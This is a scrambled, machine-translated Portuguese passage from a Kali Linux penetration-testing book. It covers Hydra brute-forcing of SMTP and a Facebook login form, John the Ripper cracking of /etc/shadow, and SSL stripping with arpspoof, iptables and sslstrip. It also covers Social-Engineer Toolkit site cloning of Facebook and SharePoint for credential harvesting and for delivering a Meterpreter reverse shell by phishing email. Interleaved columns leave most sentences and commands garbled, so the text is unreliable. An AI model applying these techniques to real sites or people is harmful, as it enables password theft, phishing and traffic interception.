100), ea lista de arquivos. Voc CBI-bin / pasta, coloque o texto nesse realizar uma fora bruta hidra-L / cloudcentrics / usernamelist- pode clicar em Procurar e selecionar a campo e clique ataque de senha. P / cloudcentrics / passwords_demo_ lista padro em Iniciar. Para acessar Hydra do Kali, ir para file.txtt-facebook.com http-get-forma ou desenvolver o seu prprio. Provavelmente, voc vai encontrar Ataques senha |Ataques online e "login.php login_attempt = 1: nome de [110] mais pastas dentro de pastas para selecione usurio avaliar. Continue o Hydra. Isto ir abrir uma Terminal = ^ ^ & EMAIL TOKEN = ^ ^ & SENHA Captulo 3 mesmo processo de parar, atualizar o janela que ir executar login = Login: incorreto " Note-se que algumas verses de Kali campo de incio e execuo de automaticamente, Hydra. A sintaxe pode ser complicado e no pode incluir os dicionrios padro. exames para mapear [109] mudar de site para site. Isto pode Voc pode baixar os dicionrios o seu alvo. A figura a seguir mostra acontecer no padro on-line e apontar para uma rvore de mapeamento para o Ataques do lado do servidor mesmo site tambm. recomendado DirBuster cgi-bin pasta: A documentao de abertura explica para dominar Tamper Data e Hydra los como mostrado no exemplo a [112] como executar Hydra. Por exemplo, em um laboratrio antes seguir: se voc quiser para apresentar ao vivo Teste de Depois de preencher as informaes Captulo 3 para atacar arquivo de senhas de uma Invaso. bsicas, clique em Comeo e Voc pode clicar no Relatrio boto conta de administrador localizado na DirBuster DirBuster ir iniciar o para gerar um relatrio de suas 192.168.1.1 usando SMTP, DirBuster projetado para diretrios e avaliao de vulnerabilidade. Muito descobertas. Voc precisa voc dever digitar: nomes de arquivos de fora bruta provavelmente, ele vai afirmar que o escolha onde deseja salvar o relatrio hidra-l admin-p / root / password.txt contra aplicaes web tempo de concluso um pouco e clique em Gerar relatrio. Um 192.168.1.1 smtp servidores. comum que os dias, no entanto, normalmente voc arquivo de texto ir aparecer Se voc gostaria de usar Hydra em servidores web apresentam-se como vai encontrar informaes teis dentro mostrando o que foi encontrado. um formulrio web, teremos de reunir uma instalao padro de minutos. A sequncia WebSlayer o estaduais, no entanto aplicaes e Screenshot identifica um / Cgi-bin / WebSlayer uma ferramenta de fora informaes foram coletadas a partir pginas so realmente escondido pasta, que poderia ser interessante: bruta aplicao web. WebSlayer pode do plug-in de dados adulterao. A dentro. DirBuster [111] ser utilizado para-bruta sintaxe para usar Hydra projetado para procurar esses fatores forar o Form (usurio / senha),GET, em um formulrio web <url>: <form escondidos. Ataques do lado do servidor E POST parmetros. WebSlayer parameters>: <failure cadeia>. DirBuster pode ser encontrado em Qualquer cdigo que no seja 404 tambm pode URL = Aplicaes Web |Crawlers Web como est aberta a fora bruta. Para ser usado para identificar os recursos https://www.facebook.com/login.php?l dirbuster. Uma vez direcionar o / CBI-bin / dobrador no vinculados, como scripts, ogin_attempt=1email=pink&passw abriu, h campos que devem ser encontrado durante a pesquisa, clique arquivos, diretrios e assim por diante. d = pinkprincessl & login = "log in" preenchidos antes de iniciar um em Pare para acabar com a WebSlayer tem um gerador de carga e ataque. No digitalizao e clique em Voltar. Na os resultados do analisador. pgina [113] na imagem seguinte. O exemplo servidor, importante conhecer o Ataques do lado do servidor mostra a configurao da carga da nome de usurio ou, mais Ataques do lado do servidor No Configurao de Ataque separador gama 0para provavelmente no vai WebSlayer O exemplo a seguir mostra a tomar as existe uma url campo, que deve ser 1000. Uma vez que o intervalo trabalho. Voc ter que capturar informaes de login capturados em preenchido com o objectivo selecionado, clicamos no adicionar solicitaes HTTP e tentar um login HTTP ao vivo URI. Abaixo do campo de URL so o gerador boto, que ser para que voc Cabealhos durante a tentativa de Cabealhos e POST campos de gerar um gerador temporal. Arraste o pode pegar o agente de usurio e acesso myspace. A senha errada entrada de dados. Tem gerador recm-criado para a Carga contedo necessrio para o ataque. comutada para uma opo para definir o tipo de paga Firefox oferece um plugin chamado a palavra-chave FUZZ para que carga, que pode ser Dicio- Criador na parte inferior e clique em Viva cabealhos HTTP, que voc WebSlayer sabe onde para tentar a nrio,AlcanceOu Carga paga. Gerar Payload. Agora podemos pode usar para reunir esta fora bruta. O O Dicionrio pode ser um arquivo importar o novo informaes durante a tentativa de um Autenticao guia tem diferentes contendo cargas, o que pode ser um carga no Configurao de Ataque login para o servidor de destino. O opes de segurana para o exemplo, arquivo personalizado guia. exemplo a seguir a autenticao ou selecionados de uma lista de [114] mostra de usurio joeymuniz usando est definido como bsico com o dicionrios disponveis. O Alcance uma senha incorreta durante a captura nome de usurio joeymuniz seguido configurao pode ser usada para Captulo 3 de pacotes com ao vivo por uma palavra-chave FUZZ. especificar o intervalo para o ataque. Depois de importar o payload para o Cabealhos HTTP. Voc basicamente de entrada do site, O Carga paga configurao pode cenrio de ataque ou selecionando [116] agente de usurio, contedo e nome importar uma carga til do dicionrios padro, de usurio conhecido. Voc Gerador Payload guia. A figura a voc deve selecionar onde a carga Captulo 3 adicionar a palavra-chave FUZZ onde seguir mostra WebSlayer alvo www. ser injetado por WebSlayer. Colocar As partes importantes de informaes as senhas so necessrias e thesecurityblogger.com: a palavra-chave capturadas a partir do Live HTTP selecione um dicionrio para O gerador de carga til uma FUZZ no URL ser atacado faz isso. Headers brute-force esses espaos de login. ferramenta que voc pode usar para Por exemplo, a tela a seguir utilizado em WebSlayer so o User- Esta uma maneira fcil de criar cargas feitas sob encomenda. mostra o alvo Agent e Dados de Acesso como automatizar a fora bruta contra Voc http://www.thesecurityblogger.com/FU mostrado na um servidor web. pode carregar dicionrios, intervalos ZZ no campo URI ataque seguinte exemplos: myspace usa a autenticao mais numricos, blocos de caracteres, onde FUZZ um ataque aproveitando As informaes do agente de usurio forte do que o exemplo fornecido. permutaes, cartes de crdito, dois dicionrios existentes iria na seo de cabealhos e Alvos com recursos de segurana nomes de usurio e outras encontrados em WebSlayer: informaes de login como bloqueio da conta, configuraes. Voc pode concatenar [115] iria na seo de dados de postagem. provavelmente, no ser e criar uma carga final que A URL deve corresponder pgina de vulnerveis a esta ferramenta. podem ser enviados para o guia de Ataques do lado do servidor login. O Ferramentas de segurana ataque para um ataque personalizado. WebSlayer pode atacar qualquer parte Autenticao seo apresenta avanadas, como a tecnologia IPS / Um exemplo da definio de uma do pedido HTTP como cabealhos e diferentes nveis de segurana e um IDS faria carga na gama Gerador Payload guia autenticao. Para WebSlayer a fora- espao para provavelmente ser alertado se o seu pode ser visto bruta a senha de um web o nome de usurio. alvo fosse um bem monitorado. Por [117] estas razes, ns cautela contra o uso de WebSlayer em senhas criptografadas tornando o verificar o tamanho de uma nova lista Voc pode avaliar a velocidade de alvos vivos sem fazer Reconnaissance processo mais fcil para os testadores de palavras, Joo Ripper, digitando john-test para adequada. de penetrao. Atacantes abra um terminal e emitir o contagem obter uma [118] Como a ferramenta, porque muito de palavras comando, uma vez que o idia de quo rpido ele ser configurvel e pode ser configurado arquivo carregado para o executado. Captulo 3 numa variedade de pasta ativa. Esse comando wc -1 [120] WebSlayer oferece a capacidade de diferentes maneiras de acelerar FILENAME. exportar cargas e descobertas no quebra de senha. comum ter palavras duplicadas Captulo 3 texto e HTML [119] quando o download e combinando Para usar um arquivo de texto formatos. O arquivo de log tambm mltiplas personalizado, como o que se pode ser capturado e colado em um Ataques do lado do servidor palavras listas da Internet. construiu no exemplo anterior arquivo de texto. John the Ripper funciona da seguinte recomendado para remover chamado Cracking senhas maneira: duplicatas, bem como qualquer NoDuplicatesOrUpperCase, Voc vai As senhas so os usurios mais maisculas letras desde John alterna precisar para editar a lista de palavras comuns de mtodos de autenticao estilos do caso automaticamente. Um padro. Isto pode ser para verificar sistemas. Ele exemplo do encontrado editando o arquivo comum identificar senhas que comando para remover palavras em john.conf sob o padro John the podem acessar outros sistemas, maisculas : Ripper pasta. Em enquanto explorando uma tr A-Z a-z <CustomWordFile> Nesse arquivo, voc vai encontrar a sistema de destino. Captulo 4, os As tentativas de cracking de senhas AllLowerCaseFile lista de palavras que aponta para um ataques do lado do cliente, fornece com palavras de dicionrio Um exemplo do comando para padro passwords.lst. uma seco dedicada a rachaduras Usa dicionrio palavras com remover duplicatas : Alterar a lista de arquivos para o nome senhas com muitas ferramentas caracteres alfanumricos anexos sort-u AllLowerCaseFile> do seu novo arquivo de lista de disponveis na Kali. A prxima seo e prefixado NoDuplicatesOrUpperCase palavras. Seguindo o anterior ir abordar Coloca dicionrio palavras juntas Verifique a nova contagem de exemplo, voc poderia alter-lo para rachaduras senhas apresentando uma Adiciona caracteres alfanumricos palavras, emitindo o contagem de Wordlist = ferramenta muito popular disponvel para combinar palavras palavras comando no seu novo NoDuplicatesOrUpperCase.lst. O em Kali. Executa palavras de dicionrio com arquivo: novo arquivo de lista de palavras deve John the Ripper caracteres especiais misturados wc -1 NoDuplicatesOrUpperCase estar na pasta especificada no John the Ripper o cracker de senha Quando tudo mais falhar, as tentativas Para abrir o John the Ripper em Kali, john.conf arquivo. O padro mais popular que usado hoje. Tem de fora bruta ir ao abrigo Ataques senha |Ataques listado sob o $ JOHN diretrio. vrios mecanismos que permitem A melhor prtica atualizar o offline e Para usar o John the Ripper em um quebrar diferentes tipos de senhas, dicionrio padro. Encontramos a lista selecionar John. Um terminal de linha arquivo de senhas, primeiro voc incluindo criptografada de palavras padro de comando ser aberta. precisa copiar o arquivo de destino e senhas hash. John the Ripper tem a limitado (cerca de 3.115 palavras) e, Johnny um GUI para John the ao Banheiro diretrio. Emita o capacidade de detectar em muitos casos no vai quebrar Ripper. Johnny coberto em Captulo comando de cpia cp para mover o automaticamente a maioria dos senhas comuns. 4, arquivo para a Banheiro hashes e Voc pode encontrar dicionrios Ataques do lado do cliente. atravs de pesquisa Google. Para diretrio. Por exemplo, para copiar um forma comum de ataques man-in-the- ataques, no entanto, a implantao de A fim de executar o man-in-the-middle arquivo shadow (um arquivo de senha middle esto entre sistemas host. No HSTS tem sido lento, e os ataques de (MITM) ataque tira SSL, voc precisa comum encontrado em muito decapagem SSL so de dois Sistemas Linux) tipo cp / etc / shadow. H pouco tempo, uma vulnerabilidade ainda amplamente utilizado hoje. peas de informao. Em primeiro Uma vez que o arquivo est no foi encontrada que abusaram do Para os fins desta seo, s estar lugar, necessrio o endereo IP do mesmo diretrio que o John the sistema que move as pessoas a partir usando uma nica interface, no alvo. Em segundo lugar, voc Ripper, emita o comando banheiro de entanto, necessrio o endereo IP do roteador eo nome do arquivo. Assim, para inseguro para proteger pginas web. sua mquina virtual pode ser que atua como gateway de sub-rede. executar John the Ripper em um Isto d atacantes a capacidade de configurada com mltiplas interfaces Uma vez que este ataque arquivo sombra, tipo john sombra. espionar usurios Ethernet. Ns mtodo s eficaz a partir da mesma Voc pode verificar o andamento de conexo para proteger servidores ter que verificar se h vrias (virtuais) camada 2 segmentos como o alvo, John the Ripper, premindo Enter, que web. A prxima seo ir cobrir essa interfaces Ethernet habilitados. iremos ir mostrar vulnerabilidade. No canto superior esquerdo da rea preciso verificar o nosso prprio a senha atual que est sendo Os ataques comuns man-in-the-middle de trabalho, clique no Xterm link para gateway padro. Para fazer isso, imaginado, bem como as rachaduras sero abordados nos prximos abrir vamos precisar de utilizar por segundo listado como c / s. captulos deste livro. um terminal de comando. Uso ifconfig o terminal de comando, uma vez mais. Voc pode pausar John the Ripper, [121] para determinar o que so interfaces Em sua edio sesso de terminal o premindo CTRL e Cchaves juntas. Se no seguinte comando: voc reiniciar Ataques do lado do servidor mquina virtual. route-n John emitindo john IMAGEM, Ele vai Tira SSL O comando ifconfig | grep "eth". Este Ou o comando filtrada shell route-n | continuar de onde parou a ltima vez Em 2009, o pesquisador de segurana comando ir filtrar-out todo o grep 'UG' | awk '{print $ 2}' vontade que o arquivo. Moxie Marlinspike em DefCon lanado as interfaces diversas e apenas nos retornar apenas o gateway padro. Para ver os resultados, uma vez Joo, tira SSL. Ele mostrar as interfaces Ethernet, Iniciando o ataque - redirecionamento os acabamentos do Estripador, tipo introduziu o conceito de despojamento conforme segue: Antes que possamos comear a john-show IMAGEM. Ento, para ver o SSL, um ataque man-in-the-middle, Se tivermos mais de uma interface coletar informaes, tais como as resultados do arquivo de sombra, tipo em que um habilitada, emitir o comando ifdown credenciais do usurio de sesses john-show sombra. proxies HTTPS atacante rede solicita com a SSL, Voc pode encontrar mais do usurio, em vez de enviar o trfego interagir nome para desativ-lo. Por precisamos obter algumas tarefas informaes sobre John the Ripper, atravs do protocolo HTTP, o qual exemplo, existem interfaces nomeada realizadas. Precisamos comear as como outros comandos no pode ser interceptado e manipulado. eth0 e eth1, instalaes que nos permitem http://www.openwall.com/. Tira SSL automatiza o ataque emitir o comando Ifdown eth0 para para redirecionar o trfego da rede. Man-in-the-middle e permite que algum interceptar o desativar o eth0 interface. Voc vai Alm disso, precisamos redirecionar o Um ataque man-in-the-middle, por trfego destinado a um site seguro. O desativar seu trfego capturado por nosso definio padro uma forma de HTTP interface no-ativo. atacando hospedeiro para que escuta ativa estrita especificao de segurana de [122] possamos encaminhar os pacotes de por ter um atacante fazer conexes transporte foi posteriormente usurios para tira SSL. Para fazer independentes com as vtimas. A desenvolvido para combater estes Captulo 3 isso, ns maioria precisa habilitar o encaminhamento de IP em Iptables e Arpspoof. [123] Configurando o redirecionamento de [125] servidores, bem como os servidores porta usando o Iptables que hospedam os servios de e-mail. Ataques do lado do servidor Isso permite que o atacante para Ataques do lado do servidor Em seguida, ns nos concentramos As prximas trs etapas ir configurar pegar o trfego destinado a um A partir do host de destino, procure em bruto-forando o encaminhamento de IP, servidor HTTP sobre TCP 80 e um servio de correio online, como ferramentas que poderiam acessar redirecionamento arpspoof, redirecionar para a porta de escuta tira https://www.hotmail.com e log in dados de sistemas que no so e configurar o redirecionamento de SSL. Neste exemplo, o Usando o menu de atalho do vulnerveis a ataques conhecidos. porta. Estes comandos so todos redireccionamento ser em TCP aplicativo para o Sslstrip diretrio, Conclumos abordando quebra de executados a partir de 10000 tanto para destino porta e abra outra senha e ataques man-in-the-middle; terminal de linha de comando. redirecionar destino. O atacante pode Terminal janela e digite o seguinte no entanto, estes assuntos tm Habilitando IP Forwarding: usar qualquer comando: dedicado sees em captulos echo 1> / proc/sys/net/ipv4/ip_forward valor aplicvel. O destino Isso agora deve mostrar-lhe os posteriores. Para os fins deste exemplo, vamos redirecionamento escolhido tambm resultados do SSL tira ataque. O prximo captulo vai se concentrar precisar de saber o IP do / host alvo deve ser utilizado para a criao [126] em identificar e explorar vtima a porta de escuta para tira SSL. O vulnerabilidades encontradas endereo. Isso para evitar comando a seguinte: Captulo 3 em sistemas hospedeiros, tambm contendas e ARP endereo iptables-t nat-A PREROUTING-p tcp - Note-se que o nome de usurio e conhecidos como dispositivos de inundaes a toda a rede destination-port 80-j REDIRECT senha foram obscurecidas no cliente. por todos os exrcitos de ataque. Em -Aos portos 10000 - exemplo a seguir, mas devem [127] um cenrio de ataque real, ela pode [124] aparecer de forma clara e em sua tela. ser ideal para executar arpspoof Resumo Ataques do lado do cliente contra todo o segmento da camada 2 Captulo 3 Este captulo explica vrios mtodos O termo cliente ou host significa um (este o padro, se IP da vtima Para desativar o PREROUTING regra, de comprometer servidores web ponto final usado para conectar a uma omitido) substitua o -A com -D para limpar toda vulnerveis rede, tal como um e / ou utilizar o pacote de captura e a tabela utilizando ferramentas disponveis no computador, um tablet, ou um cheirar, a fim de determinar a vtima regras usar. Kali. Os mtodos mais comuns esto dispositivo mvel. Um cliente pode IP. iptables-t nat-F # para lavar identificando conhecido oferecer informaes, servios e Em um ambiente com muitos hosts iptables-t nat-L # para verificar vulnerabilidades com ferramentas aplicaes para outros clientes ou isso pode fazer com que o fluxo de arpspoof tem muitas opes. Voc automatizadas e explorar o melhor obter informaes de outro sistema, trfego para diminuir e pode usar o comando man iptables caminho possvel para como um pr em causa a capacidade do ver opes adicionais. acesso ao sistema de destino. servidor. Normalmente, o cliente termo atacante de permanecer Agora voc deve ser definido e pronto O captulo comeou com foco em refere-se a terminais utilizados por despercebido. O comando : para iniciar a captura usando SSL tira! vrias ferramentas utilizadas para pessoas. Ter pessoas arpspoof-i eth0-t victimip Lanamento sslstrip e da janela de identificar vulnerabilidades. envolvido abre um leque de possveis default_gateway_ip linha de comando recm-inaugurado, O prximo tema abordado foi vulnerabilidades. Recomenda-se que voc no enviar execute o ferramentas utilizadas para explorar Ataques do lado do cliente, no que se esse processo para o fundo e deixar comando a seguir para iniciar o SSL vulnerabilidades encontradas em refere a aplicaes web, visto como a janela para cima. Basta comear tira escuta em 10000 TCP port: comum um mtodo para uma nova sesso de terminal. sslstrip-l 10000 identificar quem est ligando para Quanto menos os controles que voc escrito em um formato genrico, e Para iniciar o jogo, v para o seguinte aplicaes web, o que colocou no lugar, a menos provvel eles no incluem um gancho forte link da barra de menus Ferramentas vulnerabilidades existem naqueles que as polticas sero seguidas. para atrair a vtima, de Explorao |Social sistemas, e se esses sistemas pode Isso cria uma espada de dois gumes como um mal escrito e-mail dizendo Ferramentas de engenharia, e ser um meio para obter acesso ou ao decidir como proteger os usurios que o usurio tem o direito de fundos selecione se-toolkit. informaes finais no reclamados. A primeira vez que voc iniciar SET a partir de uma aplicao web. O foco ameaas cibernticas. Hackers sabem O uso de fontes de mdia social como em Kali, SET exibir as atualizaes deste captulo ser a identificao de disso e direcionar os usurios finais de o Facebook uma tima maneira de de distribuio SET sistemas vrias maneiras que se concentram aprender sobre um alvo, directamente a partir de GitHub. Voc acesso a aplicaes web, avaliao em comprometer uma caracterstica- como o que passatempos e padres ser presenteado com a opo de de sistemas de vulnerabilidades, e chave do usurio mdio, que de fala como alvo favor. Por exemplo, receber atualizaes explorando confiana. o desenvolvimento automaticamente. Selecionar sim para essas vulnerabilidades, se possvel. armadilhas com base em esportes receber atualizaes automticas. Este captulo vai incidir fortemente Ataques do lado do cliente bilhetes com desconto seria ideal se [130] sobre comprometer A engenharia social a arte de um perfil no Facebook de um senhas, pois eles so os mtodos manipular as pessoas para a alvo coberta com os logotipos da Captulo 4 mais comuns utilizados para proteger execuo de aes de equipe de esportes. SET ir pedir-lhe para verificar se git os sistemas de acolhimento. divulgao de informaes. Muitos Porque a maioria dos ataques do lado instalado. Kali vem com git pr- Este captulo ir kick-off, cobrindo ataques do lado do cliente so do cliente alavancar a engenharia carregado; como atacar anfitries usando baseadas em enganar um usurio social, a prxima seo ir no entanto, a melhor prtica engenharia social. final explorar um popular arsenal seguindo os passos em Captulo 1, Mais tarde, veremos como identificar em expor seus sistemas para um engenharia social disponvel em Kali. Teste de Invaso e vulnerabilidades em sistemas host ataque. A engenharia social pode Engenharia Social Toolkit (SET) Instalao, atualizar Kali. Atualizaes para que voc possa variar de chamar O Engenheiro social Toolkit (SET) foi ir incluir uma verso do git explorar essas vulnerabilidades algum fingindo ser um funcionrio criado e escrito pelo fundador da necessrio para comear a trabalhar. usando ferramentas cobertas em autorizado a postar um link em TrustedSec. uma ferramenta O Kali 1.0 no inclui o . Git diretrio. outras sees deste livro. Ns Facebook que afirma ser um servio, orientada para Python open-source Para atualizar, voc deve seguir o concluir com atacando senhas, enquanto realmente ser um meio para que visa Teste de Invaso os seguintes passos: porque eles so os meios mais comprometer usando engenharia social. SET uma 1. Abra um terminal e navegue at cd / comuns o cliente. ferramenta extremamente popular usr / share. para proteger os sistemas host. Melhores prticas para o lanamento usado por segurana 2. Faa o backup do antigo conjunto A engenharia social de um bem-sucedido ataque de profissionais para testar a postura de diretrio digitando mv definir Os seres humanos sempre sero seus engenharia social tomar o tempo segurana de uma organizao. Backup.Set. elos mais fracos para a postura de para compreender o seu alvo; Atacantes da vida real usar SET 3. Re-Download SET do GitHub segurana de um alvo. O significado aprender como os usurios para criar ataques ativos e maliciosos. usando o seguinte comando: mais voc tenta controlar os usurios se comunicam e tentativa a ferramenta de escolha para o mais git clone finais, mais eles vo tentar polticas de se misturar em seu ambiente. A comum https://github.com/trustedsec/social- bypass. maioria dos ataques de engenharia ataques de engenharia social. engineer-toolkit/ social que no tendem a ser set / 4. Salvage o velho configurao O prximo passo lanar SET, indo [134] vtimas fora da sua rede. Tipo no se arquivo para evitar ter que definir o para Ferramentas de Explorao voc est atacando vtimas no caminho do MSF usando: |Engenharia Social Captulo 4 mesma rede, tal como um laboratrio cp Backup.Set / config / set_config set Toolkit |se-toolkit. SET vai perguntar se voc gostaria de interno. / config / set_config Depois que voc aceita todas as usar um modelo existente que vem [135] [131] licenas e termos de servios, voc com o SET, ou ver a tela principal se voc gostaria de clonar um site. Os Ataques do lado do cliente Ataques do lado do cliente para SET. modelos padro no so boas, e 5. Verifique que as obras definidas [133] recomendado para clonar um site, Endereo IP / nome de host para usando o comando se-kit de como o exemplo do SharePoint conexo reversa: Quando SET ferramentas. Ataques do lado do cliente fornecida anteriormente. oferece sua carga Agora que voc entende algumas das Recomenda-se selecionar o 5) Na prxima tela, SET vai apresentar vtima, SET precisa dizer a vtima dinmicas bsicas de como funciona a Atualize o Toolkit social-Engenheiro vrias opes de como o usurio pode como ligar de volta para Kali. Numa SET, vamos opo anterior copiar ambiente de laboratrio, voc pode comprometer uma mquina cliente ao uso de SET. Uma vez atualizado, o site. Neste exemplo, usaremos a digitar o endereo IP do seu servidor usando um site que pode confiar. selecione a opo 1) Os ataques de opo local-Cloner. Selecione local- de Kali. Apesar de que podemos engenharia social-. O Cloner, URL que voc deseja clonar: Este o usar qualquer site, recomendamos imagem seguinte mostra os diferentes SET e ir fornecer uma srie de site que voc est copiando. algo que simples. vetores de ataque website disponvel perguntas. Estas questes iro Exploit para entregar: SET vai usar o Aqui est um exemplo de clonar um sob Social- orient-lo atravs Metasploit estrutura para proporcionar corporativa SharePoint local com a Ataques de engenharia em SET. A clonar um site e ter que correr de Kali. o inteno de opo de spear phishing uma oferta Site-Cloner ir solicitar o seguinte: explorar. A opo mais popular o O explorando a vtima por um de ataque populares Windows Reverse_TCP Meterpreter. carregamento meterpreter. Na a capacidade de incorporar os NAT / Port Forwarding: Esta opo O do Windows Reverse_TCP realidade, pode ser qualquer site que ataques em e-mails e PDFs. O ataque tende a confundir as pessoas. SET Meterpreter funciona por ter uma voc de phishing lana envia est pedindo vtima executar um quer comprometer. Ns escolhemos o ataque arquivos atravs de um falso se as vtimas ir se conectar a sua executvel que estabelece uma porta um site do SharePoint, pois como um e-mail originada pela vtima mquina usando o endereo IP aberta para um atacante para ligar de verificador da penetrao voc diretamente da SET. configurado volta provavelmente vai querer usar um Para este exemplo, vamos selecionar em seu servidor de Kali ou se as atravs de obter acesso shell alvo que vai atingir o seu objetivo. Vetores de Ataque Website, porque vtimas ir se conectar a um endereo completo para PC da vtima. A figura a Muitos atacantes para anteriormente IP diferente seguir propsitos nefastos podem usar um clonado um site por um ataque (Como um endereo NAT). Isso mostra as cargas disponveis. site pblico para clonar. baseado na Web site. Em seguida, realmente entra em jogo quando voc Windows Reverse_TCP Meterpreter Usando SET para clonar e ataque precisamos determinar como est atacando o [132] entregar a carga. Existem vrias pessoas fora da sua rede ou na segunda opo na lista. opes disponveis. Escolha o Java Internet. Selecionar sim se voc est Voc pode importar seu prprio Captulo 4 Applet atacando executvel. Esta geralmente usada Attack, que normalmente opo 1. pelos atacantes ou outras pessoas sesso e ter privilgios de Agora que j aprendeu alguns dos a opo de importao personalizada escrevendo suas prprias ferramentas administrador completos no dispositivo princpios bsicos do uso de SET, para apontar para o diretrio site / malwares. acessando o site clonado. vamos olhar para mais uma copiado. Voc vai precisar de [137] exemplo. Vamos olhar para a experimentar para ver o que funciona clonagem de um website para fins de melhor opo para o seu site SET vai pedir para selecionar o tipo de Ataques do lado do cliente roubo particular. tcnica de ofuscao anti-vrus que A mquina cliente ver uma uma senha. Vamos escolher opo 2) Stio Cloner. voc gostaria mensagem de Java pop-up simples, Desta vez, quando chegamos s Ns ser solicitado a digitar uma URL. para usar. SET exibir uma que parece normal e opes de ataque, vamos selecionar Iremos classificao ao lado de cada tcnica. deve passar despercebida pelo ataque harvester credencial. clone https://www.facebook.com. Selecione uma opo bem cotado, usurio mdio, como mostrado na O ataque harvester credencial pode Note-se que estamos entrando na a menos que voc deseja uma opo imagem seguinte: ser encontrado primeira seleo URL exata e especificando se especfica. A figura a seguir mostra o No momento em que o usurio final Engenharia Social queremos que o disponvel executar o applet Java no site Ataques, Vetores de Ataque Website, HTTPS ou URL HTTP. Na maioria dos opes. Ns vamos com opo 16, clonado, o Kali e, em seguida, Ataques Harvester casos, isso no far nenhuma porque tem a melhor classificao. servidor ir conectar a mquina da credencial. diferena [136] vtima, como mostrado na imagem [139] porque no vamos hospedar um site seguinte: seguro, mas em alguns casos o HTTP Captulo 4 O exemplo a seguir uma imagem Ataques do lado do cliente site pode ser diferente do que o local SET vai perguntar qual a porta ouvinte mostrando que SET pode interagir Voc tem a opo de clonar um site, de HTTPS. deve ser usado. Na maioria dos com o meterpreter usando um modelo de site, ou Tambm ser solicitado a digitar o casos, ficar com o padro sesso e emitir comandos diretamente importar endereo IP que SET vai usar para portos. Aps a ltima pergunta para a vtima: seus prprios arquivos da Web hospedar o falso respondida, SET far com que o site [138] (HTML, imagens e outros arquivos). site. Muito provavelmente este ser o clonado. Sites populares como Facebook, endereo IP da sua caixa de Kali O novo stio clonado pode ser usado Captulo 4 Gmail, Twitter e ter modelos. Entrando Linux. No entanto, se como um meio para comprometer Voc pode ter vrias sesses com o o URL do site pode clonar outros sites. voc est pensando em dirigir as alvos. Voc precisa meterpreter. Neste exemplo, foi Encontramos em alguns casos, tanto vtimas para um endereo que est para enganar os usurios para utilizado o o site usando uma traduo NAT acessar o site clonado utilizando um comando sesses de I 1. templates e clonagem de um site (Talvez atravs de um firewall navegador de Internet. O utilizador Essencialmente, o que estamos simplesmente no parece certo. upstream), digite o endereo NAT. acessando o site clonado vai ter um fazendo est interagindo com o Nesses casos, voc deve usar SET comear esperando por Java pop-up, que se for executado, ir primeiro uma importao personalizada. Voc conexes depois de ter clonado um fornecer uma sesso do meterpreter. Se tivssemos pode usar copiadora web ou software site e Reserve_TCP Meterpreter ao seu vrios hosts comprometidos, de clonagem web, o que temos configurada a porta de escuta, como servidor de Kali. O atacante pode poderamos ter j discutido, para salvar uma cpia de mostrado na imagem seguinte: iniciar um meterpreter vrias sesses Meterpreter, interagir um site em sua caixa de Kali. Uma vez [140] com eles, alternar entre eles, ou perto salvo, o uso los individualmente. Captulo 4 O prximo passo direcionar os Sistema Linux em execuo SET, ou resposta de um servidor web. ambiente. Nos prximos captulos, usurios para o site falso. Uma voc pode ver que a senha MITM Proxy pode permitir que um vamos examinar outros tipos de maneira comum de fazer isso capturada. verificador da penetrao para proxies, no entanto, o enviando um e-mail falso tambm [142] examinar os ataques de forma rpida razo gostamos MitM Proxy porque conhecido como phishing e-mail. SET e uma maneira fcil como verificador pode automatizar isso para Captulo 4 ver o que solicitaes e respostas so da penetrao voc pode voc, mas para este exemplo, ns Alm do registo directo, SET ir gerar provenientes de navegador web. ferramentas de ataque de ensaio por decidimos faz-lo manualmente. O um relatrio do incidente, de modo MITM Proxy t-los conectados diretamente em sua prximo exemplo mostra um que o pode ser lanado, indo para Barrilha caixa de Kali Linux. falso e-mail usando o nosso link atacante pode aproveitar as |Sniffing / Spoofing |Sniffers Web e Hospedar digitalizao Facebook clonado. Quando o usurio credenciais roubadas em um selecionando mitmproxy. Um mtodo comum para acesso a clica no link www. momento posterior. [143] sistemas de host de identificar e facebook.com, eles sero enviados Ao utilizar ferramentas como o SET explorar para o nosso site falso em para atacar clientes, importante para Ataques do lado do cliente vulnerabilidades no sistema facebook.secmob.net. um verificador da penetrao recomendado usar MITM Proxy operacional, os aplicativos instalados, [141] para entender o comportamento dos quando a criao de um ataque SET, e outros programas. clientes. Uma das maneiras mais como Ferramentas como Nessus so Ataques do lado do cliente eficientes de fazer isso bem como quando se analisa o mtodos para avaliar os sistemas de Voc pode ver na imagem seguinte usando um servidor proxy para comportamento de ataque. Voc deve conhecido automatizado pgina clonada parece com o examinar e pedidos de interceptao executar SET vulnerabilidades. Esta seo ir cobrir Facebook, mas da web. e Proxy MITM ao mesmo tempo em a forma de instalar e executar o o URL no realmente Facebook. O Em Captulo 6, ataques na Web, um ambiente de teste. Nessus contra um alvo ataque assume a vtima no vai notar vamos olhar para Proxies com muito Uma vez procurao MitM sistema. Ferramentas Explorao a mais detalhes, no entanto, carregado, voc ter que apontar o abordados Captulo 3, os ataques do ligeiramente diferente URL, que por ainda importante para aprender a navegador do seu cliente para o lado do servidor, pode ser usado para isso que ataques de phishing reais analisar a forma como o cliente se seu servidor de Kali. MITM exibir as tirar vantagem das vulnerabilidades usar domnios semelhantes comporta ao usar web transaes que ocorrem no identificadas pelo Nessus. o site real. ataques como o uso de SET como solicitaes da Web [144] Quando a vtima entra em seu nome pargrafo anterior descrito. do lado do cliente, como mostrado na no site falso, SET ir redirecionar o MitM Proxy imagem seguinte: Captulo 4 usurio MITM Proxy uma grande ferramenta Haver um registro de todas as Hospedar digitalizao com Nessus para o site real. Na maioria dos casos, para um verificador da penetrao atividades do navegador passando por O Nessus no vm pr-instalados com os usurios podero digitar sua senha para examinar o cliente cliente. Embora MITM Kali. Voc vai precisar de obter uma segunda vez sobre o real vulnerabilidades. Ele permite que o Proxy no utilizado como um registro local e ser registrado no site, sem administrador para examinar a componente activo num teste tpico de cdigo de Defensvel usar Nessus. nunca perceber que eles foram conexo HTTPS, parada, penetrao da web, que um Defensvel d uma opo de atacados. Na Kali examinar e responder trfego. MITM tima ferramenta para usar quando alimentao de casa, mas limitada Proxy permite que um administrador configurar e testar SET antes de usar para alterar o pedido o pacote em um ao vivo para a digitalizao de 16 endereos tar-xzvf control.tar.gz certificado. Depois de algumas telas estamos escolhendo digitalizao em IP. Se voc gostaria de digitalizar mais ar vx Nessus-5.2.1-debian6 *, iniciais de auto-explicativo, voc ser rede externa. IPs, voc deve comprar um tar-xzvf data.tar.gz solicitado a digitar [148] rao profissional de sustentvel. tar-xzvf 